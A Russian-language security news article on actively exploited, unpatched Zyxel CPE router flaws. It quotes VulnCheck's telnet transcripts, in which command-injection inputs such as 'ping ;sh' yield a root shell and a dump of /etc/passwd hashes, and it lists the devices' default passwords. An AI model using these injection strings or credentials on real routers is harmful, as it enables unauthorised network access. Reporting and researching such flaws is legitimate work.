Zyxel выпустила рекомендацию по безопасности, которая описывает активно эксплуатируемые уязвимости в маршрутизаторах CPE. Компания предупредила, что не планирует выпускать исправления, и призвала пользователей перейти на более новые модели.
Впервые о двух уязвимостях в июле 2024 года сообщили исследователи VulnCheck. На прошлой неделе их коллеги из GreyNoise заявили, что видели попытки их эксплуатации.
В обновлении VulnCheck представила полную информацию об уязвимостях, атаки с использованием которых направлены на получение доступа к сетям:
-
CVE-2024-40891 — аутентифицированные пользователи могут использовать инъекцию команд Telnet из-за неправильной проверки команд в libcms_cli.so. Некоторые (например, ifconfig, ping, tftp) передаются без проверки в функцию выполнения оболочки, что позволяет выполнять произвольный код с использованием метасимволов оболочки;
albinolobster@mournland:~$ telnet 192.168.0.1 Trying 192.168.0.1... Connected to 192.168.0.1. Escape character is '^]'. Zyxel VMG4325-B10A Login: zyuser Password: > tftp -h || sh tftp: invalid option -- h BusyBox v1.17.2 (2017-06-15 12:25:20 CST) multi-call binary. Usage: tftp [OPTIONS] HOST [PORT] Transfer a file from/to tftp server Options: -l FILE Local FILE -r FILE Remote FILE -g Get file -p Put file -g -t i -f filename server_ip Get (flash) broadcom or whole image to modem -g -t c -f filename server_ip Get (flash) config file to modem -p -t f -f filename server_ip Put (backup) config file to tftpd server BusyBox v1.17.2 (2017-06-15 12:25:20 CST) built-in shell (ash) Enter 'help' for a list of built-in commands. # ls -l drwxr-xr-x 3 supervis root 0 Jan 1 1970 app drwxr-xr-x 2 supervis root 0 Jun 15 2017 bin -rw-r--r-- 1 supervis root 163928 Jun 15 2017 cferam.000 drwxr-xr-x 4 supervis root 0 Jan 1 1970 data drwxrwxr-x 4 supervis root 0 Jun 15 2017 dev drwxr-xr-x 10 supervis root 0 Jun 15 2017 etc drwxr-xr-x 2 supervis root 0 Jan 1 1970 home drwxrwxr-x 6 supervis root 0 Jun 15 2017 lib lrwxrwxrwx 1 supervis root 11 Jun 15 2017 linuxrc -> bin/busybox drwxr-xr-x 2 supervis root 0 Jan 1 1970 log drwxr-xr-x 2 supervis root 0 Jan 3 20:29 mnt drwxrwxr-x 5 supervis root 0 Jun 15 2017 opt dr-xr-xr-x 90 supervis root 0 Jan 1 1970 proc drwxrwxr-x 2 supervis root 0 Jun 15 2017 sbin drwxr-xr-x 11 supervis root 0 Jan 1 1970 sys lrwxrwxrwx 1 supervis root 8 Jun 15 2017 tmp -> /var/tmp drwxrwxr-x 4 supervis root 0 Jun 15 2017 usr drwxr-xr-x 14 supervis root 0 Jan 3 22:09 var -rw-rw-r-- 1 supervis root 1446798 Jun 15 2017 vmlinux.lz drwxrwxr-x 4 supervis root 0 Jun 15 2017 webs # -
CVE-2025-0890 — устройства используют слабые учётные данные по умолчанию (admin:1234, zyuser:1234, supervisor:zyad1234), которые многие пользователи не меняют. Учётная запись supervisor имеет скрытые привилегии, предоставляя полный доступ к системе, в то время как zyuser может использовать CVE-2024-40891 для удалённого выполнения кода.
<X_404A03_LoginCfg> <AdminUserName>supervisor</AdminUserName> <AdminPassword>enlhZDEyMzQ=</AdminPassword> <X_404A03_LoginGroupNumberOfEntries>2</X_404A03_LoginGroupNumberOfEntries> <X_404A03_Login_Group instance="1"> <Privilege>broadband,wireless,homeNetworking,routing,qos,nat,dns,igmpSetting,halfBridge,intfGrp,usbService,firewall,macFilter,parentalControl,schedulerRule,certificates,ipsecVPN,log,trafficStatus,arpTable,routeTable,igmpGroupStatus,xdslStatistics,system,userAccount,remoteMGMT,tr069Client,tr064,time,emailNotification,logSetting,firmwareUpgrade,configuration,reboot,disagnostic,HelpDesk,wizard,sniffer,snmp</Privilege> <Name>Administrator</Name> <ConsoleLevel>2</ConsoleLevel> <Use_Login_Info instance="1"> <UserName>admin</UserName> <Password>MTIzNAA=</Password> <LoginFailCount>0</LoginFailCount> <LoginFailCountLeft>1</LoginFailCountLeft> </Use_Login_Info> <Use_Login_Info nextInstance="2" ></Use_Login_Info> </X_404A03_Login_Group> <X_404A03_Login_Group instance="2"> <GroupKey>2</GroupKey> <Privilege>broadband,wireless,homeNetworking,routing,qos,nat,dns,igmpSetting,halfBridge,intfGrp,usbService,firewall,macFilter,parentalControl,schedulerRule,certificates,ipsecVPN,log,trafficStatus,arpTable,routeTable,igmpGroupStatus,xdslStatistics,system,userAccount,remoteMGMT,tr069Client,tr064,time,emailNotification,logSetting,firmwareUpgrade,configuration,reboot,disagnostic,HelpDesk,wizard,sniffer,snmp</Privilege> <Name>User</Name> <ConsoleLevel>2</ConsoleLevel> <Use_Login_Info instance="1"> <UserName>zyuser</UserName> <Password>MTIzNAA=</Password> <LoginFailCount>0</LoginFailCount> <LoginFailCountLeft>1</LoginFailCountLeft> </Use_Login_Info> <Use_Login_Info nextInstance="2" ></Use_Login_Info> </X_404A03_Login_Group> <X_404A03_Login_Group nextInstance="3" ></X_404A03_Login_Group> </X_404A03_LoginCfg>
В VulnCheck также продемонстрировали эксплойт атаки на маршрутизатор VMG4325-B10A с версией прошивки 1.00(AAFR.4)C0_20170615.
albinolobster@mournland:~$ telnet 192.168.0.1 Trying 192.168.0.1... Connected to 192.168.0.1. Escape character is '^]'. Zyxel VMG4325-B10A Login: zyuser Password: > sh telnetd:error:694.808:processInput:472:unrecognized command sh > ping ;sh BusyBox v1.17.2 (2017-06-15 12:25:20 CST) multi-call binary. Usage: ping [OPTIONS] HOST Send ICMP ECHO_REQUEST packets to network hosts Options: -4, -6 Force IP or IPv6 name resolution -c CNT Send only CNT pings -s SIZE Send SIZE data bytes in packets (default:56) -I IFACE/IP Use interface or IP address as source -W SEC Seconds to wait for the first response (default:10) (after all -c CNT packets are sent) -w SEC Seconds until ping exits (default:infinite) (can exit earlier with -c CNT) -q Quiet, only displays output at start and when finished BusyBox v1.17.2 (2017-06-15 12:25:20 CST) built-in shell (ash) Enter 'help' for a list of built-in commands. # cat /etc/passwd supervisor:gNvaS9TkEwk..:0:0:Administrator:/:/bin/sh nobody:Mm/NWrZmKMrT2:99:99:nobody for ftp:/:/bin/false admin:d7uXUhqhH7hew:100:0:Administrator:/:/bin/sh zyuser:hH7gnvw0ISLfg:101:2:User:/:/bin/sh
«Хотя эти системы устарели и, по-видимому, давно не поддерживаются, они остаются весьма актуальными и используются по всему миру», — пояснили исследователи. Согласно подсчётам, уязвимости затрагивают более 1500 моделей Zyxel.
В Zyxel подтвердили эту информацию и отметили, что «модели VMG1312-B10A, VMG1312-B10B, VMG1312-B10E, VMG3312-B10A, VMG3313-B10A, VMG3926-B10B, VMG4325-B10A, VMG4380-B10A, VMG8324-B10A, VMG8924-B10A, SBG3300 и SBG3500, являются устаревшими продуктами, срок службы которых истёк много лет назад».
Производитель также рассказал о третьей уязвимости CVE-2024-40890, которая похожа на CVE-2024-40891.
В сентябре Zyxel выпустила обновления безопасности для устранения критической уязвимости, затрагивающей несколько моделей бизнес-маршрутизаторов. Потенциально она позволяет неаутентифицированным злоумышленникам выполнять инъекцию команд ОС. Уязвимость, отслеживаемая как CVE-2024-7261, представляет собой ошибку проверки входных данных из-за неправильной их обработки. Это позволяет удалённым злоумышленникам выполнять произвольные команды в операционной системе хоста.
Тогда же D-Link объявила, что не будет исправлять четыре уязвимости удалённого выполнения кода во всех версиях оборудования и прошивки маршрутизатора DIR-846W, так как эти продукты больше не поддерживаются.
В декабре сообщалось, что ботнеты Ficora и Capsaicin нарастили активность в атаках на маршрутизаторы D-Link, а новая версия на базе Mirai нацеливается на несколько сетевых видеорегистраторов и маршрутизаторов TP-Link с устаревшей прошивкой.
ссылка на оригинал статьи https://habr.com/ru/articles/879598/
Добавить комментарий